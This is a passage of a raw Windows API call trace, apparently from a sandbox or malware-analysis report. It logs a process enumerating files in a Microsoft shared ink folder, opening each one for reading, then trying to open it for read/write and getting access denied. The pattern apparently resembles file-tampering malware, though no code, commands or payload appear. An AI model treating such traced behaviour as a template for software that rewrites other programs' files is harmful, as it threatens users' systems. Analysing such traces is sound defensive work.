(HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0084.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0084.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0084.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0084.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fb08 [0084.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0084.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0084.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0084.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0084.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0084.314] AreFileApisANSI () returned 1 [0084.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll", lpUsedDefaultChar=0x0) returned 62 [0084.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0084.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0084.314] AreFileApisANSI () returned 1 [0084.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ea48 [0084.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll") returned 62 [0084.315] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0084.315] GetFileType (hFile=0x348) returned 0x1 [0084.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0084.315] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.315] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.315] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.315] CloseHandle (hObject=0x348) returned 1 [0084.316] AreFileApisANSI () returned 1 [0084.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6df20 [0084.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll") returned 62 [0084.316] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.316] GetLastError () returned 0x5 [0084.316] GetLastError () returned 0x5 [0084.316] SetLastError (dwErrCode=0x5) [0084.316] GetLastError () returned 0x5 [0084.316] SetLastError (dwErrCode=0x5) [0084.316] GetLastError () returned 0x5 [0084.316] SetLastError (dwErrCode=0x5) [0084.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0084.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0084.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.316] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.316] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.316] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d14d081, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe467a929, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe467a929, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x59a00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="InputPersonalization.exe", cAlternateFileName="")) returned 1 [0084.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0084.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b30 [0084.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0084.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0084.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0084.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0084.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0084.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0084.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0084.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0084.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0084.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0084.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0084.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0084.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0084.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0084.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0084.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0084.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x50cf8 [0084.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0084.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0084.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0084.317] AreFileApisANSI () returned 1 [0084.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InputPersonalization.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InputPersonalization.exe", lpUsedDefaultChar=0x0) returned 76 [0084.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d9a0 [0084.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0084.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0084.318] AreFileApisANSI () returned 1 [0084.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0084.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85800 [0084.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x85800, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InputPersonalization.exe") returned 76 [0084.318] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InputPersonalization.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inputpersonalization.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.433] GetFileType (hFile=0x364) returned 0x1 [0084.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85800 | out: hHeap=0x20000) returned 1 [0084.433] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.434] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.434] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.434] CloseHandle (hObject=0x364) returned 1 [0084.434] AreFileApisANSI () returned 1 [0084.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0084.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x856c0 [0084.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d9a0, cbMultiByte=-1, lpWideCharStr=0x856c0, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InputPersonalization.exe") returned 76 [0084.434] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InputPersonalization.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inputpersonalization.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.434] GetLastError () returned 0x5 [0084.434] GetLastError () returned 0x5 [0084.434] SetLastError (dwErrCode=0x5) [0084.434] GetLastError () returned 0x5 [0084.434] SetLastError (dwErrCode=0x5) [0084.435] GetLastError () returned 0x5 [0084.435] SetLastError (dwErrCode=0x5) [0084.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x856c0 | out: hHeap=0x20000) returned 1 [0084.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0084.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d9a0 | out: hHeap=0x20000) returned 1 [0084.435] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.435] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.435] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x972, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipsar.xml", cAlternateFileName="")) returned 1 [0084.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0084.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0084.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0084.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0084.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0084.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0084.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0084.435] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.436] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.436] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.436] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0084.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.436] AreFileApisANSI () returned 1 [0084.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml", lpUsedDefaultChar=0x0) returned 61 [0084.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.436] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.436] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0084.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0084.436] AreFileApisANSI () returned 1 [0084.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0084.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6e4f8 [0084.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6e4f8, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 61 [0084.436] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.438] GetFileType (hFile=0x364) returned 0x1 [0084.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0084.438] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.438] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.439] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.439] CloseHandle (hObject=0x364) returned 1 [0084.439] AreFileApisANSI () returned 1 [0084.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0084.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6ec68 [0084.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x52dd0, cbMultiByte=-1, lpWideCharStr=0x6ec68, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml") returned 61 [0084.439] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.439] GetLastError () returned 0x5 [0084.439] GetLastError () returned 0x5 [0084.439] SetLastError (dwErrCode=0x5) [0084.439] GetLastError () returned 0x5 [0084.439] SetLastError (dwErrCode=0x5) [0084.439] GetLastError () returned 0x5 [0084.439] SetLastError (dwErrCode=0x5) [0084.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0084.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.440] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.440] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.440] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa20, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipscat.xml", cAlternateFileName="")) returned 1 [0084.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0084.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: 